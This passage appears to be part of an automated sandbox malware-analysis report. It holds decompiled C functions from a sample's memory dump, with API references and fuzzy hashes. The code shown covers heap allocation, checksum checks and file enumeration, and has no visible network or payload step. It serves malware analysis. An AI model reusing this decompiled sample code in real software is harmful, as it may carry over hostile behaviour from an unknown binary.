                                          0x0040ed35
                                          0x0040ed3a
                                          0x0040ed3a
                                          0x0040ed43
                                          0x0040ed47
                                          0x0040ed4f
                                          0x0040ed53
                                          0x0040ed5e
                                          0x0040ed62
                                          0x0040ed6d
                                          0x0040ed71
                                          0x0040ed7c
                                          0x0040ed80
                                          0x0040ed85
                                          0x0040ed8c
                                          0x0040ed8f
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040EA10
                                            • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                                          • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                                          • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                                          • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E0040F648(intOrPtr* __ecx, void* __eflags) {
                                          				char* _t92;
                                          				signed char _t103;
                                          				intOrPtr* _t104;
                                          				signed char _t106;
                                          				void* _t112;
                                          				void* _t116;
                                          				signed char _t120;
                                          				void* _t124;
                                          				signed int _t137;
                                          				intOrPtr* _t144;
                                          				void* _t145;
                                          				void* _t164;
                                          				signed char _t168;
                                          				intOrPtr _t170;
                                          				intOrPtr* _t173;
                                          				signed char _t175;
                                          				void* _t176;
                                          
                                          				E00413954(E0041A7FC, _t176);
                                          				_t170 =  *((intOrPtr*)(_t176 + 8));
                                          				_t173 = __ecx;
                                          				E0040D377(_t170);
                                          				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
                                          				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
                                          				_t92 = _t170 + 0x130;
                                          				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
                                          				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
                                          				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
                                          				if( *_t92 != 0) {
                                          					E0040DB47(_t143);
                                          				}
                                          				_t144 = _t173 + 0x34;
                                          				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
                                          				_t137 =  *(_t173 + 0x40);
                                          				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
                                          				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
                                          				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
                                          				_t164 = 0x14;
                                          				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
                                          				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
                                          					E0040DB47(_t144);
                                          				}
                                          				_t145 = 0;
                                          				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
                                          				asm("adc edx, ecx");
                                          				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
                                          				if(( *(_t176 - 0x20) | _t137) != 0) {
                                          					__eflags = _t137 - _t145;
                                          					if(_t137 > _t145) {
                                          						L11:
                                          						_t103 = 1;
                                          					} else {
                                          						__eflags =  *(_t176 - 0x20) - 0xffffffff;
                                          						if( *(_t176 - 0x20) > 0xffffffff) {
                                          							goto L11;
                                          						} else {
                                          							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
                                          							if(__eflags > 0) {
                                          								L12:
                                          								_t104 =  *_t173;
                                          								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
                                          								__eflags = _t103;
                                          								if(_t103 == 0) {
                                          									 *((intOrPtr*)(_t176 - 0x30)) = 0;
                                          									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
                                          									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                                          									 *(_t176 - 4) = 0;
                                          									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
                                          									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
                                          									__eflags = _t106;
                                          									if(_t106 == 0) {
                                          										_t168 =  *(_t176 - 0x20);
                                          										asm("adc ecx, 0x0");
                                          										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
                                          										asm("adc [esi+0x4c], ecx");
                                          										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
                                          										asm("adc ebx, [ebp-0x14]");
                                          										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
                                          										asm("adc ebx, 0x0");
                                          										 *(_t170 + 0x1cc) = _t137;
                                          										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
                                          										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
                                          										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
                                          											E0040DB47(_t151);
                                          										}
                                          										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
                                          										 *(_t176 - 4) = 1;
                                          										E0040DAE2(_t173, _t176 - 0x34);
                                          										E004032A8(_t176 - 0x48, 4);
                                          										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                                          										_t154 =  *((intOrPtr*)(_t173 + 0x18));
                                          										 *(_t176 - 4) = 2;
                                          										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                                          										__eflags = _t116 - 1;
                                          										if(_t116 != 1) {
                                          											L19:
                                          											__eflags = _t116 - 0x17;
                                          											if(_t116 != 0x17) {
                                          												L21:
                                          												E0040DB47(_t154);
                                          											} else {
                                          												__eflags = _t168;
                                          												if(__eflags != 0) {
                                          													goto L21;
                                          												}
                                          											}
                                          											_t155 = _t173;
                                          											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
                                          											__eflags = _t120;
                                          											if(_t120 == 0) {
                                          												__eflags =  *(_t176 - 0x40);
                                          												if( *(_t176 - 0x40) != 0) {
                                          													__eflags =  *(_t176 - 0x40) - 1;
                                          													if( *(_t176 - 0x40) > 1) {
                                          														E0040DB47(_t155);
                                          													}
                                          													E0040DA34(_t176 - 0x28);
                                          													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
                                          													_t158 =  *((intOrPtr*)(_t173 + 0x18));
                                          													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                                          													__eflags = _t124 - 1;
                                          													if(_t124 != 1) {
                                          														L30:
                                          														E0040DB47(_t158);
                                          													} else {
                                          														__eflags = _t168;
                                          														if(_t168 != 0) {
                                          															goto L30;
                                          														}
                                          													}
                                          													goto L31;
                                          												} else {
                                          													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                                          													 *(_t176 - 4) = 4;
                                          													_t175 = 0;
                                          												}
                                          											} else {
                                          												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                                          												 *(_t176 - 4) = 3;
                                          												goto L32;
                                          											}
                                          										} else {
                                          											__eflags = _t168;
                                          											if(_t168 == 0) {
                                          												L31:
                                          												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
                                          												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
                                          												_t120 = E0040ED98(_t173, _t168, _t170);
                                          												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                                          												 *(_t176 - 4) = 5;
                                          												L32:
                                          												_t175 = _t120;
                                          											} else {
                                          												goto L19;
                                          											}
                                          										}
                                          										E004042D6();
                                          										 *(_t176 - 4) = 1;
                                          										E004042AD(_t176 - 0x48);
                                          										_t81 = _t176 - 4;
                                          										 *_t81 =  *(_t176 - 4) & 0x00000000;
                                          										__eflags =  *_t81;
                                          										E0040DA34(_t176 - 0x28);
                                          									} else {
                                          										_t175 = _t106;
                                          									}
                                          									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                                          									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
                                          									_t103 = _t175;
                                          								}
                                          							} else {
                                          								if(__eflags < 0) {
                                          									goto L11;
                                          								} else {
                                          									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
                                          									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
                                          										goto L12;
                                          									} else {
                                          										goto L11;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_t103 = 0;
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
                                          				return _t103;
                                          			}





















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                          • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                                          • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                          • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040C783(void* __ecx) {
                                          				intOrPtr _t59;
                                          				intOrPtr* _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t64;
                                          				intOrPtr* _t66;
                                          				intOrPtr _t68;
                                          				intOrPtr* _t69;
                                          				intOrPtr _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr _t83;
                                          				signed int _t97;
                                          				void* _t100;
                                          				intOrPtr* _t101;
                                          				intOrPtr _t102;
                                          				void* _t104;
                                          
                                          				E00413954(E0041A330, _t104);
                                          				_t100 = __ecx;
                                          				_t59 =  *((intOrPtr*)(__ecx + 0x28));
                                          				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
                                          					 *(_t104 - 0x10) = 2;
                                          				} else {
                                          					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
                                          				}
                                          				 *((intOrPtr*)(_t104 - 0x14)) = 0;
                                          				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
                                          				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
                                          				 *(_t104 - 4) = 0;
                                          				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
                                          				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
                                          				if(_t61 == 0) {
                                          					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
                                          					_t64 =  *((intOrPtr*)(_t100 + 0xc));
                                          					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
                                          					 *((intOrPtr*)(_t64 + 0x10)) = 0;
                                          					 *((intOrPtr*)(_t64 + 0x14)) = 0;
                                          					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
                                          					_t83 =  *((intOrPtr*)(_t100 + 0x14));
                                          					 *((char*)(_t100 + 0x2e)) = 1;
                                          					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
                                          					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
                                          					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
                                          					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
                                          						 *(_t104 - 0x10) = 2;
                                          					}
                                          					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
                                          					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
                                          					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                                          					_t102 = _t68;
                                          					_t69 =  *((intOrPtr*)(_t104 - 0x14));
                                          					if(_t69 != 0) {
                                          						 *((intOrPtr*)( *_t69 + 8))(_t69);
                                          					}
                                          					_t70 = _t102;
                                          				} else {
                                          					_t72 =  *((intOrPtr*)(_t104 - 0x14));
                                          					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                                          					if(_t72 != 0) {
                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          					}
                                          					_t70 =  *((intOrPtr*)(_t104 - 0x18));
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
                                          				return _t70;
                                          			}



















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                          • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                                          • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                          • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E0040D1AB() {
                                          				intOrPtr* _t44;
                                          				intOrPtr _t50;
                                          				void* _t61;
                                          				intOrPtr* _t62;
                                          				void* _t75;
                                          				intOrPtr _t76;
                                          				void* _t79;
                                          				intOrPtr* _t80;
                                          				void* _t82;
                                          				void* _t84;
                                          
                                          				E00413954(E0041A550, _t82);
                                          				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                          				_t62 =  *((intOrPtr*)(_t82 + 8));
                                          				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
                                          				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
                                          				_t80 =  *((intOrPtr*)(_t82 + 0x14));
                                          				 *(_t82 - 4) = 1;
                                          				_t87 = _t80;
                                          				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
                                          				if(_t80 != 0) {
                                          					 *((intOrPtr*)( *_t80 + 4))(_t80);
                                          				}
                                          				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
                                          				 *(_t82 - 4) = 3;
                                          				E00402155(_t82 - 0x60);
                                          				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
                                          				_push( *((intOrPtr*)(_t82 + 0x10)));
                                          				 *(_t82 - 4) = 4;
                                          				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
                                          				_t88 = _t76;
                                          				if(_t76 == 0) {
                                          					_t77 = _t62 + 0x10;
                                          					_push(_t62 + 0x10); // executed
                                          					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
                                          					__eflags = _t44;
                                          					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
                                          					if(__eflags == 0) {
                                          						E0040F4D8(_t77);
                                          						E0040F51A();
                                          						E0040F56F(_t77);
                                          						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
                                          						 *(_t82 - 4) = 2;
                                          						E0040D2CF(_t82 - 0x64, __eflags);
                                          						__eflags = _t80;
                                          						 *(_t82 - 4) = 1;
                                          						if(_t80 != 0) {
                                          							 *((intOrPtr*)( *_t80 + 8))(_t80);
                                          						}
                                          						_t50 = 0;
                                          					} else {
                                          						 *(_t82 - 4) = 2;
                                          						E0040D2CF(_t82 - 0x64, __eflags);
                                          						__eflags = _t80;
                                          						 *(_t82 - 4) = 1;
                                          						if(_t80 != 0) {
                                          							 *((intOrPtr*)( *_t80 + 8))(_t80);
                                          						}
                                          						_t50 =  *((intOrPtr*)(_t82 + 0x14));
                                          					}
                                          				} else {
                                          					 *(_t82 - 4) = 2;
                                          					E0040D2CF(_t82 - 0x64, _t88);
                                          					 *(_t82 - 4) = 1;
                                          					if(_t80 != 0) {
                                          						 *((intOrPtr*)( *_t80 + 8))(_t80);
                                          					}
                                          					_t50 = _t76;
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
                                          				return _t50;
                                          			}














                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040D1B0
                                            • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                            • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                          • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                                          • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                                          • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00404C4A(intOrPtr* __ecx, void* __eflags) {
                                          				void* _t33;
                                          				intOrPtr _t43;
                                          				void* _t47;
                                          				intOrPtr _t53;
                                          				intOrPtr* _t82;
                                          				void* _t84;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          
                                          				E00413954(E004195D4, _t84);
                                          				_t87 = _t86 - 0x64;
                                          				_t82 = __ecx;
                                          				E00404D51(_t84 - 0x70);
                                          				_t53 = 0;
                                          				_push(0x5c);
                                          				 *((intOrPtr*)(_t84 - 4)) = 0;
                                          				E00405468(_t84 - 0x1c, __ecx);
                                          				_push(0x2a);
                                          				 *((char*)(_t84 - 4)) = 1;
                                          				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
                                          				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
                                          				 *((char*)(_t84 - 4)) = 3;
                                          				E00403D24(_t84 - 0x34, _t33);
                                          				 *((char*)(_t84 - 4)) = 5;
                                          				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
                                          				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
                                          					_t87 = _t87 - 0xc;
                                          					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
                                          					E00403D24(_t87, _t84 - 0x1c);
                                          					_t47 = E00404D6C(_t84 - 0x70); // executed
                                          					if(_t47 != _t53) {
                                          						continue;
                                          					} else {
                                          						 *((char*)(_t84 - 4)) = 1;
                                          						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                                          						E0040551A(_t84 - 0x38);
                                          						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                                          						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                                          						_t43 = 0;
                                          					}
                                          					L7:
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
                                          					return _t43;
                                          				}
                                          				 *((char*)(_t84 - 4)) = 1;
                                          				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                                          				E0040551A(_t84 - 0x38);
                                          				if(E0040489C( *_t82, 0) != 0) {
                                          					_t53 = E004048AA( *_t82);
                                          				}
                                          				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                                          				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                                          				_t43 = _t53;
                                          				goto L7;
                                          			}












                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00404C4F
                                            • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                            • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                                          • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                                          • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                                          • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 24%
                                          			E00413EA3(unsigned int _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				void* _v32;
                                          				intOrPtr _t19;
                                          				void* _t20;
                                          				signed char _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				void* _t36;
                                          				unsigned int _t44;
                                          				unsigned int _t46;
                                          				intOrPtr _t47;
                                          				void* _t50;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x41b988);
                                          				_push(E00414A2C);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t47;
                                          				_t19 =  *0x425a38; // 0x1
                                          				if(_t19 != 3) {
                                          					__eflags = _t19 - 2;
                                          					if(_t19 != 2) {
                                          						goto L11;
                                          					} else {
                                          						_t24 = _a4;
                                          						__eflags = _t24;
                                          						if(_t24 == 0) {
                                          							_t44 = 0x10;
                                          						} else {
                                          							_t9 = _t24 + 0xf; // 0xf
                                          							_t44 = _t9 & 0xfffffff0;
                                          						}
                                          						_a4 = _t44;
                                          						__eflags = _t44 -  *0x42283c; // 0x1e0
                                          						if(__eflags > 0) {
                                          							L10:
                                          							_push(_t44);
                                          							goto L14;
                                          						} else {
                                          							E0041570A(9);
                                          							_pop(_t36);
                                          							_v8 = 1;
                                          							_v32 = E00416894(_t36, _t44 >> 4);
                                          							_v8 = _v8 | 0xffffffff;
                                          							E00413F69();
                                          							_t23 = _v32;
                                          							__eflags = _t23;
                                          							if(_t23 == 0) {
                                          								goto L10;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_t46 = _a4;
                                          					_t50 = _t46 -  *0x425a30; // 0x0
                                          					if(_t50 > 0) {
                                          						L11:
                                          						_t20 = _a4;
                                          						__eflags = _t20;
                                          						if(_t20 == 0) {
                                          							_t20 = 1;
                                          						}
                                          						_t22 = _t20 + 0x0000000f & 0x000000f0;
                                          						__eflags = _t22;
                                          						_push(_t22);
                                          						L14:
                                          						_push(0);
                                          						_t23 = RtlAllocateHeap( *0x425a34); // executed
                                          					} else {
                                          						E0041570A(9);
                                          						_v8 = _v8 & 0x00000000;
                                          						_push(_t46);
                                          						_v32 = E00415DF1();
                                          						_v8 = _v8 | 0xffffffff;
                                          						E00413F0A();
                                          						_t23 = _v32;
                                          						if(_t23 == 0) {
                                          							goto L11;
                                          						} else {
                                          						}
                                          					}
                                          				}
                                          				 *[fs:0x0] = _v20;
                                          				return _t23;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$AllocateEnterHeapInitialize
                                          • String ID:
                                          • API String ID: 1616793339-0
                                          • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                          • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                                          • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                                          • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                                          Uniqueness

